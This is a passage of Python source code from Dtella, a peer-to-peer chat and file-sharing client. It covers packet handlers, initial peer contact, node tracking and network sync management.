if (dcall_timeleft(src_n.expire_dcall) > NODE_EXPIRE_EXTEND):
osm.scheduleNodeExpire(src_n, NODE_EXPIRE_EXTEND)
self.handleBroadcast(ad, data, check_cb)
def handlePacket_PF(self, ad, data):
        # Direct: Possible Failure (precursor to NF)
osm = self.main.osm
if not (osm and osm.syncd):
raise BadTimingError("Not ready for PF")
(kind, nb_ipp, dead_ipp, pktnum, sesid
) = self.decodePacket('!2s6s6sI4s', data)
self.checkSource(nb_ipp, ad, exempt_ip=True)
try:
n = osm.lookup_ipp[dead_ipp]
except KeyError:
raise BadTimingError("PF received for not-online node")
if n.sesid != sesid:
raise BadTimingError("PF has the wrong session ID")
if self.isOutdatedStatus(n, pktnum):
raise BadTimingError("PF is outdated")
osm.pgm.handleNodeFailure(n.ipp, nb_ipp)
def handlePacket_CH(self, ad, data):
# Broadcast: Chat message
osm = self.main.osm
def check_cb(src_n, src_ipp, rest):
(pktnum, nhash, flags, rest
) = self.decodePacket('!I4sB+', rest)
text, rest = self.decodeString2(rest)
if rest:
raise BadPacketError("Extra data")
if src_ipp == osm.me.ipp:
# Possibly a spoofed chat from me
if nhash == osm.me.nickHash():
dch = self.main.getOnlineDCH()
if dch:
dch.pushStatus(
"*** Chat spoofing detected: %s" % text)
raise BadBroadcast("Spoofed chat")
if not osm.syncd:
# Not syncd, forward blindly
return
if osm.isModerated():
# Note: this may desync the sender's chat_pktnum, causing
# their next valid message to be delayed by 2 seconds, but
# it's better than broadcasting useless traffic.
raise BadBroadcast("Chat is moderated")
elif src_n and nhash == src_n.nickHash():
osm.cms.addMessage(
src_n, pktnum, src_n.nick, text, flags)
else:
raise Reject
self.handleBroadcast(ad, data, check_cb)
def handlePacket_TP(self, ad, data):
# Broadcast: Set topic
osm = self.main.osm
def check_cb(src_n, src_ipp, rest):
(pktnum, nhash, rest
) = self.decodePacket('!I4s+', rest)
topic, rest = self.decodeString1(rest)
if rest:
raise BadPacketError("Extra data")
if src_ipp == osm.me.ipp:
# Possibly a spoofed topic from me
if nhash == osm.me.nickHash():
dch = self.main.getOnlineDCH()
if dch:
dch.pushStatus(
"*** Topic spoofing detected: %s" % topic)
raise BadBroadcast("Spoofed topic")
if not osm.syncd:
# Not syncd, forward blindly
return None
if src_n and nhash == src_n.nickHash():
osm.tm.gotTopic(src_n, topic)
else:
raise Reject
self.handleBroadcast(ad, data, check_cb)
def handlePacket_SQ(self, ad, data):
# Broadcast: Search Request
osm = self.main.osm
def check_cb(src_n, src_ipp, rest):
(pktnum, rest
) = self.decodePacket("!I+", rest)
string, rest = self.decodeString1(rest)
if rest:
raise BadPacketError("Extra data")
if src_ipp == osm.me.ipp:
raise BadBroadcast("Spoofed search")
if not osm.syncd:
# Not syncd, forward blindly
return
if src_n:
# Looks good
dch = self.main.getOnlineDCH()
if dch:
dch.pushSearchRequest(src_ipp, string)
else:
# From an invalid node
raise Reject
self.handleBroadcast(ad, data, check_cb)
def handlePacket_AK(self, ad, data):
# Direct: Acknowledgement
osm = self.main.osm
if not osm:
raise BadTimingError("Not ready for AK packet")
(kind, src_ipp, mode, flags, ack_key
) = self.decodePacket('!2s6sBB8s', data)
self.checkSource(src_ipp, ad, exempt_ip=True)
reject = bool(flags & ACK_REJECT_BIT)
if mode == ACK_PRIVATE:
# Handle a private message ack
if not osm.syncd:
raise BadTimingError("Not ready for PM AK packet")
try:
n = osm.lookup_ipp[src_ipp]
except KeyError:
raise BadTimingError("AK: Unknown PM ACK node")
else:
n.receivedPrivateMessageAck(ack_key, reject)
elif mode == ACK_BROADCAST:
# Handle a broadcast ack
if osm.syncd and reject:
osm.mrm.receivedRejection(ack_key, src_ipp)
# Tell MRM to stop retransmitting message to this neighbor
osm.mrm.pokeMessage(ack_key, src_ipp)
else:
raise BadPacketError("Unknown AK mode")
def handlePacket_CA(self, ad, data):
# Direct: ConnectToMe
def cb(dch, n, rest):
# SSLHACK: newer Dtella versions have an extra flags byte, to allow
# for SSL connection requests. Try to decode both forms.
try:
flags, port = self.decodePacket('!BH', rest)
except BadPacketError:
flags = 0
port, = self.decodePacket('!H', rest)
if port == 0:
raise BadPacketError("Zero port")
ad = Ad().setRawIPPort(n.ipp)
ad.port = port
use_ssl = bool(flags & USE_SSL_BIT)
dch.pushConnectToMe(ad, use_ssl)
self.handlePrivMsg(ad, data, cb)
def handlePacket_CP(self, ad, data):
# Direct: RevConnectToMe
def cb(dch, n, rest):
if rest:
raise BadPacketError("Extra data")
n.openRevConnectWindow()
dch.pushRevConnectToMe(n.nick)
self.handlePrivMsg(ad, data, cb)
def handlePacket_PM(self, ad, data):
# Direct: Private Message
def cb(dch, n, rest):
flags, rest = self.decodePacket('!B+', rest)
text, rest = self.decodeString2(rest)
if rest:
raise BadPacketError("Extra data")
notice = bool(flags & NOTICE_BIT)
if notice:
nick = "*N %s" % n.nick
dch.pushChatMessage(nick, text)
else:
dch.pushPrivMsg(n.nick, text)
self.handlePrivMsg(ad, data, cb)
def handlePacket_PG(self, ad, data):
# Direct: Local Ping
osm = self.main.osm
if not osm:
raise BadTimingError("Not ready to receive pings yet")
(kind, src_ipp, flags, rest
) = self.decodePacket('!2s6sB+', data)
self.checkSource(src_ipp, ad, exempt_ip=True)
uwant = bool(flags & IWANT_BIT)
u_got_ack = bool(flags & GOTACK_BIT)
req = bool(flags & REQ_BIT)
ack = bool(flags & ACK_BIT)
nblist = bool(flags & NBLIST_BIT)
if req:
req_key, rest = self.decodePacket('!4s+', rest)
else:
req_key = None
if ack:
ack_key, rest = self.decodePacket('!4s+', rest)
else:
ack_key = None
if nblist:
# Get neighbor list
nbs, rest = self.decodeNodeList(rest)
if len(nbs) > 8:
raise BadPacketError("Too many neighbors")
if len(set(nbs)) != len(nbs):
raise BadPacketError("Neighbors not all unique")
else:
nbs = None
if rest:
raise BadPacketError("Extra Data")
osm.pgm.receivedPing(src_ipp, uwant, u_got_ack, req_key, ack_key, nbs)
def handlePacket_YQ(self, ad, data):
# Sync Request
(kind, nb_ipp, hop, flags, src_ipp, sesid
) = self.decodePacket('!2s6sBB6s4s', data)
osm = self.main.osm
if not (osm and osm.syncd):
raise BadTimingError("Not ready to handle a sync request")
# Hidden nodes shouldn't be getting sync requests.
if self.main.hide_node:
raise BadTimingError("Hidden node can't handle sync requests.")
self.checkSource(nb_ipp, ad, exempt_ip=True)
src_ad = Ad().setRawIPPort(src_ipp)
if not src_ad.auth('sbx', self.main):
raise BadPacketError("Invalid source IP")
timedout = bool(flags & TIMEDOUT_BIT)
if not 0 <= hop <= 2:
raise BadPacketError("Bad hop count")
elif hop == 2 and src_ipp != nb_ipp:
raise BadPacketError("Source ip mismatch")
# Decrease hop count, and call handler
osm.yqrm.receivedSyncRequest(nb_ipp, src_ipp, sesid, hop, timedout)
def handlePacket_YR(self, ad, data):
# Sync Reply
osm = self.main.osm
if not (osm and osm.sm):
raise BadTimingError("Not ready for sync reply")
(kind, src_ipp, pktnum, expire, sesid, uptime, flags, rest
) = self.decodePacket('!2s6sIH4sIB+', data)
self.checkSource(src_ipp, ad)
persist = bool(flags & PERSIST_BIT)
nick, rest = self.decodeString1(rest)
info, rest = self.decodeString1(rest)
topic, rest = self.decodeString1(rest)
c_nbs, rest = self.decodeNodeList(rest)
u_nbs, rest = self.decodeNodeList(rest)
# 2011-08-21: allow 'rest' to be non-empty, in case we want to add
# new fields someday.
if len(rest) > 1024:
raise BadPacketError("Too much extra data")
if not (5 <= expire <= 30*60):
raise BadPacketError("Expire time out of range")
try:
n = osm.lookup_ipp[src_ipp]
except KeyError:
n = None
if self.isFromBridgeNode(n, src_ipp):
raise BadPacketError("Bridge can't use YR")
# Check for outdated status, in case an NS already arrived.
if not self.isOutdatedStatus(n, pktnum):
n = osm.refreshNodeStatus(
src_ipp, pktnum, expire, sesid, uptime, persist, nick, info)
if topic:
osm.tm.receivedSyncTopic(n, topic)
osm.sm.receivedSyncReply(src_ipp, c_nbs, u_nbs)
def handlePacket_EC(self, ad, data):
# Login echo
osm = self.main.osm
if not osm:
raise BadTimingError("Not ready for login echo")
(kind, rand
) = self.decodePacket('!2s8s', data)
osm.receivedLoginEcho(ad, rand)
##############################################################################
class InitialContactManager(DatagramProtocol):
    # Scans through a list of known IP:Ports, sending a small ping to a
    # bunch of them. Collects addresses of known online peers, and
    # eventually passes the list off to the neighbor connection manager.
class PeerInfo(object):
# Keep the latest timestamps at the top of the heap.
__lt__ = lambda self,other: self.seen > other.seen
__le__ = lambda self,other: self.seen >= other.seen
def __init__(self, ipp, seen):
self.ipp = ipp
self.seen = seen
self.inheap = True
self.timeout_dcall = None
self.alt_reply = False
self.bad_code = False
def __init__(self, main):
self.main = main
self.deferred = None
self.peers = {} # {IPPort -> PeerInfo object}
for ipp, seen in self.main.state.peers.iteritems():
self.peers[ipp] = self.PeerInfo(ipp, seen)
self.heap = self.peers.values()
heapq.heapify(self.heap)
self.waitreply = set()
self.node_ipps = set()
self.initrequest_dcall = None
self.finish_dcall = None
self.counters = {
'good':0, 'foreign_ip':0, 'banned_ip':0, 'dead_port':0}
def start(self):
CHECK(self.deferred is None)
self.deferred = defer.Deferred()
self.main.showLoginStatus("Scanning For Online Nodes...", counter=1)
# Get the main UDP socket's bind interface (usually empty)
bind_ip = self.main.ph.transport.interface
# Listen on an arbitrary UDP port
try:
reactor.listenUDP(0, self, interface=bind_ip)
except twisted.internet.error.BindError:
self.main.showLoginStatus("Failed to bind alt UDP port!")
self.deferred.callback(('no_nodes', None))
else:
self.scheduleInitRequest()
return self.deferred
def newPeer(self, ipp, seen):
# Called by PeerAddressManager
try:
p = self.peers[ipp]
except KeyError:
p = self.peers[ipp] = self.PeerInfo(ipp, seen)
heapq.heappush(self.heap, p)
self.scheduleInitRequest()
else:
if seen > p.seen:
p.seen = seen
# Bubble it up the heap.
# This takes O(n) and uses an undocumented heapq function...
if p.inheap:
heapq._siftdown(self.heap, 0, self.heap.index(p))
def scheduleInitRequest(self):
if not self.deferred:
return
if self.initrequest_dcall:
return
def cb():
self.initrequest_dcall = None
try:
p = heapq.heappop(self.heap)
except IndexError:
self.checkStatus()
return
p.inheap = False
ad = Ad().setRawIPPort(p.ipp)
packet = ['IQ']
packet.append(ad.getRawIP())
packet.append(struct.pack('!H', self.main.state.udp_port))
self.main.logPacket("IQ -> %s:%d" % ad.getAddrTuple())
packet = self.main.pk_enc.encrypt(''.join(packet))
try:
# Send from the alternate port
self.transport.write(packet, ad.getAddrTuple())
except (AttributeError, socket.error):
# Socket got funky, let the timeouts take care of it.
pass
except RuntimeError:
                # Workaround for the Twisted infinite recursion bug
pass
else:
self.schedulePeerContactTimeout(p)
self.initrequest_dcall = reactor.callLater(0.05, cb)
self.initrequest_dcall = reactor.callLater(0, cb)
def schedulePeerContactTimeout(self, p):
CHECK(p not in self.waitreply)
self.waitreply.add(p)
def cb():
p.timeout_dcall = None
self.waitreply.remove(p)
if p.alt_reply:
self.recordResultType('dead_port')
self.checkStatus()
p.timeout_dcall = reactor.callLater(5.0, cb)
def cancelPeerContactTimeout(self, p):
try:
self.waitreply.remove(p)
except KeyError:
return False
dcall_discard(p, 'timeout_dcall')
return True
def receivedInitResponse(self, src_ipp, myip, code, pc, nd=None):
# Get my own IP address
my_ad = Ad().setRawIP(myip)
self.main.logPacket("Init Response: myip=%s code=%d" %
(my_ad.getTextIP(), code))
try:
p = self.peers[src_ipp]
except KeyError:
raise BadPacketError("Didn't ask for this response")
if nd is None:
# IC packet
            # Ignore it if we've already gotten one, or if the IR
            # has already arrived or expired.
if p.alt_reply or p.timeout_dcall is None:
return
p.alt_reply = True
else:
# IR packet
if not self.cancelPeerContactTimeout(p):
# Wasn't waiting for this reply
return
# Add some new peers to our cache
if pc:
for ipp, age in pc:
ad = Ad().setRawIPPort(ipp)
self.main.state.refreshPeer(ad, age)
# Add my own IP to the list, even if it's banned.
src_ad = Ad().setRawIPPort(src_ipp)
self.main.addMyIPReport(src_ad, my_ad)
if code != CODE_IP_OK:
if not p.bad_code:
p.bad_code = True
if code == CODE_IP_FOREIGN:
self.recordResultType('foreign_ip')
elif code == CODE_IP_BANNED:
self.recordResultType('banned_ip')
self.cancelPeerContactTimeout(p)
self.checkStatus()
return
# Add the node who sent this packet to the cache
self.main.state.refreshPeer(src_ad, 0)
# If this is an IC packet, stop here.
if nd is None:
return
# Add to set of currently online nodes
if nd:
for ipp, age in nd:
ad = Ad().setRawIPPort(ipp)
# Add to the peer cache
self.main.state.refreshPeer(ad, age)
# Add to set of probably-active nodes
self.node_ipps.add(ipp)
self.recordResultType('good')
# Check if there's nothing left to do
self.checkStatus()
def recordResultType(self, kind):
self.main.logPacket("Recording result: '%s'" % kind)
self.counters[kind] += 1
# Finish init after 5 seconds of inactivity
if self.finish_dcall:
self.finish_dcall.reset(5.0)
return
def cb():
self.finish_dcall = None
self.checkStatus(finished=True)
self.finish_dcall = reactor.callLater(5.0, cb)
def checkStatus(self, finished=False):
# Stop if
# - We receive 5 good replies, which make up >= 10% of the total
# - We receive 50 total replies
# - There is a 5-second gap of no new replies
# After stopping, successful if good makes up >= 10% of the total
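# Example: 5 good replies out of 40 total (12.5%) finishes early
# with success via the elif branch below.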
total = sum(self.counters.values())
ngood = self.counters['good']
if not (self.heap or self.waitreply) or total >= 50:
finished = True
if finished:
if total > 0 and ngood >= total * 0.10:
self.initCompleted(good=True)
else:
self.initCompleted(good=False)
elif ngood >= 5 and ngood >= total * 0.10:
self.initCompleted(good=True)
def initCompleted(self, good):
self.shutdown()
if good:
self.deferred.callback(('good', self.node_ipps))
else:
# In a tie, prefer 'banned_ip' over 'foreign_ip', etc.
rank = []
i = 3
for name in ('banned_ip', 'foreign_ip', 'dead_port'):
rank.append( (self.counters[name], i, name) )
i -= 1
# Sort in descending order
rank.sort(reverse=True)
if rank[0][0] == 0:
# Nobody replied
self.deferred.callback(('no_nodes', None))
else:
# Return the name of the failure which occurred most
self.deferred.callback((rank[0][2], None))
def datagramReceived(self, data, addr):
# Let the main PeerHandler take care of decoding packets sent
# to the alternate UDP port.
self.main.ph.datagramReceived(data, addr, altport=True)
def shutdown(self):
# Cancel all dcalls
dcall_discard(self, 'initrequest_dcall')
dcall_discard(self, 'finish_dcall')
for p in self.peers.values():
dcall_discard(p, 'timeout_dcall')
# Close socket
if self.transport:
self.transport.stopListening()
##############################################################################
class Node(object):
implements(IDtellaNickNode)
__lt__ = lambda self,other: self.dist < other.dist
__le__ = lambda self,other: self.dist <= other.dist
# For statistics (bridge nicks are False)
is_peer = True
# This will be redefined for bridge nodes
bridge_data = None
# Remember when we receive a RevConnect
rcWindow_dcall = None
def __init__(self, ipp):
# Dtella Tracking stuff
self.ipp = ipp # 6-byte IP:Port
self.sesid = None # 4-byte session ID
self.dist = None # 16-byte md5 "distance"
self.expire_dcall = None # dcall for expiring stale nodes
self.status_pktnum = None # Pktnum of last status update
# ChatMessageSequencer stuff
self.chatq = []
self.chatq_base = None
self.chatq_dcall = None
# ack_key -> timeout DelayedCall
self.msgkeys_out = {}
self.msgkeys_in = {}
# General Info
self.nick = ''
self.dcinfo = ''
self.location = ''
self.shared = 0
self.dttag = ""
self.infohash = None
self.uptime = 0.0
self.persist = False
def calcDistance(self, me):
# Distance is pseudo-random, to keep the network spread out
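# Hashing the two keys in sorted order makes the metric
# symmetric: dist(A, B) == dist(B, A).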
my_key = me.ipp + me.sesid
nb_key = self.ipp + self.sesid
if my_key <= nb_key:
self.dist = md5(my_key + nb_key).digest()
else:
self.dist = md5(nb_key + my_key).digest()
def nickHash(self):
# Return a 4-byte hash to prevent a transient nick mismapping
if self.nick:
return md5(self.ipp + self.sesid + self.nick).digest()[:4]
else:
return None
def flags(self):
flags = (self.persist and PERSIST_BIT)
return struct.pack('!B', flags)
def getPMAckKey(self):
# Generate random packet ID for messages going TO this node
while 1:
ack_key = randbytes(8)
if ack_key not in self.msgkeys_out:
break
return ack_key
def pokePMKey(self, ack_key):
# Schedule expiration of a PM ack key, for messages we
# receive _FROM_ this node.
# Return True if this is a new key
try:
self.msgkeys_in[ack_key].reset(60.0)
return False
except KeyError:
def cb():
self.msgkeys_in.pop(ack_key)
self.msgkeys_in[ack_key] = reactor.callLater(60.0, cb)
return True
def setInfo(self, info):
old_dcinfo = self.dcinfo
self.dcinfo, self.location, self.shared = (
parse_incoming_info(SSLHACK_filter_flags(info)))
if self.sesid is None:
# Node is uninitialized
self.infohash = None
else:
self.infohash = md5(
self.sesid + self.flags() + self.nick + '|' + info
).digest()[:4]
return self.dcinfo != old_dcinfo
def setNoUser(self):
# Wipe out the nick, and set info to contain only a Dt tag.
self.nick = ''
if self.dttag:
self.setInfo("<%s>" % self.dttag)
else:
self.setInfo("")
def openRevConnectWindow(self):
# When we get a RevConnect, open a 5-second window during
# which errors are suppressed for outgoing connects.
if self.rcWindow_dcall:
self.rcWindow_dcall.reset(5.0)
return
def cb():
del self.rcWindow_dcall
self.rcWindow_dcall = reactor.callLater(5.0, cb)
def checkRevConnectWindow(self):
# If the RevConnect window is open, close it and return True.
if self.rcWindow_dcall:
self.rcWindow_dcall.cancel()
del self.rcWindow_dcall
return True
else:
return False
def sendPrivateMessage(self, ph, ack_key, packet, fail_cb):
# Send an ACK-able direct message to this node
def cb(tries):
if tries == 0:
del self.msgkeys_out[ack_key]
fail_cb("Timeout")
return
ad = Ad().setRawIPPort(self.ipp)
ph.sendPacket(packet, ad.getAddrTuple())
# Set timeout for outbound message
# This will be cancelled if we receive an AK in time.
dcall = reactor.callLater(1.0, cb, tries-1)
dcall.pm_fail_cb = fail_cb
self.msgkeys_out[ack_key] = dcall
# Send it 3 times, then fail.
cb(3)
def receivedPrivateMessageAck(self, ack_key, reject):
# Got an ACK for a private message
try:
dcall = self.msgkeys_out.pop(ack_key)
except KeyError:
return
if reject:
dcall.pm_fail_cb("Rejected")
dcall.cancel()
def event_PrivateMessage(self, main, text, fail_cb):
osm = main.osm
if len(text) > 1024:
text = text[:1024-12] + ' [Truncated]'
flags = 0
ack_key = self.getPMAckKey()
packet = ['PM']
packet.append(osm.me.ipp)
packet.append(ack_key)
packet.append(osm.me.nickHash())
packet.append(self.nickHash())
packet.append(struct.pack('!BH', flags, len(text)))
packet.append(text)
packet = ''.join(packet)
self.sendPrivateMessage(main.ph, ack_key, packet, fail_cb)
def event_ConnectToMe(self, main, port, use_ssl, fail_cb):
osm = main.osm
ack_key = self.getPMAckKey()
flags = (use_ssl and USE_SSL_BIT)
packet = ['CA']
packet.append(osm.me.ipp)
packet.append(ack_key)
packet.append(osm.me.nickHash())
packet.append(self.nickHash())
if flags:
# SSLHACK: This packet can't be understood by older Dtella
# versions, but stripping the SSL flag from MyINFO should
# prevent it from happening very often.
packet.append(struct.pack('!B', flags))
packet.append(struct.pack('!H', port))
packet = ''.join(packet)
self.sendPrivateMessage(main.ph, ack_key, packet, fail_cb)
def event_RevConnectToMe(self, main, fail_cb):
osm = main.osm
ack_key = self.getPMAckKey()
packet = ['CP']
packet.append(osm.me.ipp)
packet.append(ack_key)
packet.append(osm.me.nickHash())
packet.append(self.nickHash())
packet = ''.join(packet)
self.sendPrivateMessage(main.ph, ack_key, packet, fail_cb)
def nickRemoved(self, main):
osm = main.osm
# Cancel all pending privmsg timeouts
for dcall in self.msgkeys_in.itervalues():
dcall.cancel()
for dcall in self.msgkeys_out.itervalues():
dcall.cancel()
self.msgkeys_in.clear()
self.msgkeys_out.clear()
osm.cms.clearQueue(self)
# Bridge stuff
if osm.bsm:
osm.bsm.nickRemoved(self)
def shutdown(self, main):
dcall_discard(self, 'expire_dcall')
dcall_discard(self, 'rcWindow_dcall')
self.nickRemoved(main)
if self.bridge_data:
self.bridge_data.shutdown()
verifyClass(IDtellaNickNode, Node)
class MeNode(Node):
info_out = ""
def event_PrivateMessage(self, main, text, fail_cb):
dch = main.getOnlineDCH()
if dch:
dch.pushPrivMsg(dch.nick, text)
else:
fail_cb("I'm not online!")
def event_ConnectToMe(self, main, port, use_ssl, fail_cb):
fail_cb("can't get files from yourself!")
def event_RevConnectToMe(self, main, fail_cb):
fail_cb("can't get files from yourself!")
verifyClass(IDtellaNickNode, MeNode)
##############################################################################
class SyncManager(object):
class SyncInfo(object):
def __init__(self, ipp):
self.ipp = ipp
self.timeout_dcall = None
self.fail_limit = 2
# Used for stats
self.in_total = False
self.in_done = False
self.proxy_request = False
def __init__(self, main):
self.main = main
self.uncontacted = RandSet()
self.waitcount = 0
self.info = {}
for n in self.main.osm.nodes:
s = self.info[n.ipp] = self.SyncInfo(n.ipp)
s.in_total = True
self.uncontacted.add(n.ipp)
# Keep stats for how far along we are
self.stats_done = 0
self.stats_total = len(self.uncontacted)
self.stats_lastbar = -1
self.proxy_success = 0
self.proxy_failed = 0
self.main.showLoginStatus("Network Sync In Progress...", counter='inc')
self.showProgress_dcall = None
self.showProgress()
# Start smaller to prevent an initial flood
self.request_limit = 2
self.advanceQueue()
def updateStats(self, s, done, total):
# Update the sync statistics for a single node.
if done > 0 and not s.in_done:
s.in_done = True
self.stats_done += 1
elif done < 0 and s.in_done:
s.in_done = False
self.stats_done -= 1
if total > 0 and not s.in_total:
s.in_total = True
self.stats_total += 1
elif total < 0 and s.in_total:
s.in_total = False
self.stats_total -= 1
def showProgress(self):
# Notify the user of the sync stats, if they've changed.
MAX = 20
done = self.stats_done
total = self.stats_total
if total == 0:
bar = MAX
else:
bar = (MAX * done) // total
dcall_discard(self, 'showProgress_dcall')
def cb():
self.showProgress_dcall = None
if bar == self.stats_lastbar:
return
self.stats_lastbar = bar
progress = '>'*bar + '_'*(MAX-bar)
self.main.showLoginStatus(
"[%s] (%d/%d)" % (progress, done, total))
if bar == MAX:
# The final update should draw immediately
cb()
else:
# Otherwise, only draw once per reactor loop
self.showProgress_dcall = reactor.callLater(0, cb)
def advanceQueue(self):
# Raise request limit the first time it fills up
if self.request_limit < 5 and self.waitcount >= 5:
self.request_limit = 5
while self.waitcount < self.request_limit:
try:
# Grab an arbitrary (semi-pseudorandom) uncontacted node.
ipp = self.uncontacted.pop()
except KeyError:
# Ran out of nodes; see if we're done yet.
if self.waitcount == 0:
dcall_discard(self, 'showProgress_dcall')
self.main.osm.syncComplete()
return
s = self.info[ipp]
osm = self.main.osm
ph = self.main.ph
hops = 2
flags = (s.fail_limit < 2) and TIMEDOUT_BIT
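# fail_limit starts at 2, so < 2 means an earlier request timed out.
# TIMEDOUT_BIT makes the peer reply even if it already saw this request.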
# Send the sync request
packet = osm.mrm.broadcastHeader('YQ', osm.me.ipp, hops, flags)
packet.append(osm.me.sesid)
ad = Ad().setRawIPPort(s.ipp)
ph.sendPacket(''.join(packet), ad.getAddrTuple())
self.scheduleSyncTimeout(s)
def giveUpNode(self, ipp):
# This node seems to have left the network, so don't contact it.
try:
s = self.info.pop(ipp)
except KeyError:
return
self.uncontacted.discard(ipp)
self.cancelSyncTimeout(s)
self.updateStats(s, -1, -1)
self.showProgress()
def receivedSyncReply(self, src_ipp, c_nbs, u_nbs):
my_ipp = self.main.osm.me.ipp
# Loop through all the nodes that were just contacted by proxy
for ipp in c_nbs:
if ipp == my_ipp:
continue
try:
s = self.info[ipp]
except KeyError:
# Haven't seen this one before, set a timeout because
# we should be hearing a reply.
s = self.info[ipp] = self.SyncInfo(ipp)
self.scheduleSyncTimeout(s, proxy=True)
self.updateStats(s, 0, +1)
else:
if ipp in self.uncontacted:
# Seen this node, had planned to ping it later.
# Pretend like we just pinged it now.
self.uncontacted.discard(ipp)
self.scheduleSyncTimeout(s, proxy=True)
# Loop through all the nodes which weren't contacted by this
# host, but which the host lists as its neighbors.
for ipp in u_nbs:
if ipp == my_ipp:
continue
if ipp not in self.info:
# If we haven't heard of this node before, create some
# info and plan on pinging it later
s = self.info[ipp] = self.SyncInfo(ipp)
self.uncontacted.add(ipp)
self.updateStats(s, 0, +1)
self.advanceQueue()
# Mark off that we've received a reply.
try:
s = self.info[src_ipp]
except KeyError:
s = self.info[src_ipp] = self.SyncInfo(src_ipp)
# Keep track of NAT stats
if s.proxy_request:
s.proxy_request = False
if s.fail_limit == 2:
self.proxy_success += 1
elif s.fail_limit == 1:
self.proxy_failed += 1
if (self.proxy_failed + self.proxy_success >= 10 and
self.proxy_failed > self.proxy_success):
self.main.needPortForward()
return
self.uncontacted.discard(src_ipp)
self.updateStats(s, +1, +1)
self.showProgress()
self.cancelSyncTimeout(s)
def scheduleSyncTimeout(self, s, proxy=False):
if s.timeout_dcall:
return
def cb():
s.timeout_dcall = None
self.waitcount -= 1
s.fail_limit -= 1
if s.fail_limit > 0:
# Try again later
self.uncontacted.add(s.ipp)
else:
self.updateStats(s, 0, -1)
self.showProgress()
self.advanceQueue()
# Remember if this was requested first by another node
if s.fail_limit == 2 and proxy:
s.proxy_request = True
self.waitcount += 1
s.timeout_dcall = reactor.callLater(2.0, cb)
def cancelSyncTimeout(self, s):
if not s.timeout_dcall:
return
dcall_discard(s, 'timeout_dcall')
self.waitcount -= 1
self.advanceQueue()
def shutdown(self):
# Cancel all timeouts
dcall_discard(self, 'showProgress_dcall')
for s in self.info.values():
dcall_discard(s, 'timeout_dcall')
##############################################################################
class OnlineStateManager(object):
def __init__(self, main, my_ipp, node_ipps, bcm=None, bsm=None):
self.main = main
self.main.osm = self
self.syncd = False
# Don't allow myself in the nodes list
if node_ipps:
node_ipps.discard(my_ipp)
# Create a Node for me
self.me = MeNode(my_ipp)
self.me.sesid = randbytes(4)
self.me.uptime = seconds()
# NickManager
self.nkm = NickManager(main)
# MessageRoutingManager
self.mrm = MessageRoutingManager(main)
# PingManager
self.pgm = PingManager(main)
# TopicManager
self.tm = TopicManager(main)
# BanManager
self.banm = BanManager(main)
# ChatMessageSequencer
self.cms = ChatMessageSequencer(main)
# BridgeClientManager / BridgeServerManager
self.bcm = bcm
self.bsm = bsm
# SyncManager (init after contacting the first neighbor)
self.sm = None
# Init all these when sync is established:
self.yqrm = None # SyncRequestRoutingManager
self.sendStatus_dcall = None
# Keep track of outbound status rate limiting
self.statusLimit_time = seconds() - 999
self.statusLimit_dcall = None
self.sendLoginEcho()
# List of online nodes, sorted by random distance.
self.nodes = []
# Index of online nodes: ipp -> Node()
self.lookup_ipp = {}
for ipp in node_ipps:
self.addNodeToNodesList(Node(ipp))
# Initially, we'll just connect to random nodes.
# This list will be sorted after syncing is finished.
random.shuffle(self.nodes)
if self.nodes:
self.main.showLoginStatus(
"Joining The Network.", counter='inc')
self.pgm.scheduleMakeNewLinks()
else:
self.main.showLoginStatus(
"Creating a new empty network.", counter='inc')
self.syncComplete()
def syncComplete(self):
# Forget the SyncManager
self.sm = None
# Unconfirmed nodes (without an expiration) can't exist once the
# network is syncd, so purge them from the nodes list.
old_nodes = self.nodes
self.nodes = []
self.lookup_ipp.clear()
for n in old_nodes:
if n.expire_dcall:
self.addNodeToNodesList(n)
else:
self.pgm.removeOutboundLink(n.ipp)
self.reorderNodesList()
# Get ready to handle Sync requests from other nodes
self.yqrm = SyncRequestRoutingManager(self.main)
self.syncd = True
if self.bsm:
self.bsm.syncComplete()
# Connect to the "closest" neighbors
self.pgm.scheduleMakeNewLinks()
# Tell observers to get the nick list, topic, etc.
self.main.stateChange_DtellaUp()
self.main.showLoginStatus(
"Sync Complete; You're Online!", counter='inc')
def refreshNodeStatus(self, src_ipp, pktnum, expire, sesid, uptime,
persist, nick, info):
CHECK(src_ipp != self.me.ipp)
try:
n = self.lookup_ipp[src_ipp]
in_nodes = True
except KeyError:
n = Node(src_ipp)
in_nodes = False
self.main.logPacket("Status: %s %d (%s)" %
(hexlify(src_ipp), expire, nick))
# Update the last-seen status packet number
n.status_pktnum = pktnum
# Change uptime to a fixed time when the node went up
uptime = seconds() - uptime
if self.syncd and in_nodes and n.sesid != sesid:
# session ID changed; remove n from sorted nodes list
# so that it will be reinserted into the correct place
self.removeNodeFromNodesList(n)
in_nodes = False
# Update info
n.sesid = sesid
n.uptime = uptime
n.persist = persist
# Save version info
n.dttag = parse_dtella_tag(info)
if nick == n.nick:
# Nick hasn't changed, just update info
self.nkm.setInfoInList(n, info)
else:
# Nick has changed.
# Remove old nick, if it's in there
self.nkm.removeNode(n, "No DC client")
# Run a sanity check on the new nick
if nick and validateNick(nick) != '':
# Malformed
n.setNoUser()
else:
# Good nick, update the info
n.nick = nick
n.setInfo(info)
# Try to add the new nick (no-op if the nick is empty)
try:
self.nkm.addNode(n)
except NickError:
n.setNoUser()
# If n isn't in nodes list, then add it
if not in_nodes:
self.addNodeToNodesList(n)
# Expire this node after the expected retransmit
self.scheduleNodeExpire(n, expire + NODE_EXPIRE_EXTEND)
# Possibly make this new node an outgoing link
self.pgm.scheduleMakeNewLinks()
# Return the node
return n
def nodeExited(self, n, reason):
# Node n dropped off the network
dcall_discard(n, 'expire_dcall')
self.removeNodeFromNodesList(n)
# Tell the TopicManager this node is leaving
self.tm.checkLeavingNode(n)
# If it's a bridge node, clean up the extra data
if n.bridge_data:
n.bridge_data.myNodeExited()
del n.bridge_data
# Remove from the nick mapping
self.nkm.removeNode(n, reason)
n.dttag = ""
n.setNoUser()
# Remove from the SyncManager, if it's active
if self.sm:
self.sm.giveUpNode(n.ipp)
# Remove from outbound links; find more if needed.
if self.pgm.removeOutboundLink(n.ipp):
self.pgm.scheduleMakeNewLinks()
def addNodeToNodesList(self, n):
if self.syncd:
n.calcDistance(self.me)
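# Once syncd, self.nodes stays sorted by md5 distance
# (Node.__lt__), so the closest peers sit at the front.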
bisect.insort(self.nodes, n)
else:
self.nodes.append(n)
self.lookup_ipp[n.ipp] = n
def removeNodeFromNodesList(self, n):
# Remove a node from self.nodes. It must exist.
if self.syncd:
i = bisect.bisect_left(self.nodes, n)
CHECK(self.nodes[i] == n)
del self.nodes[i]
else:
self.nodes.remove(n)
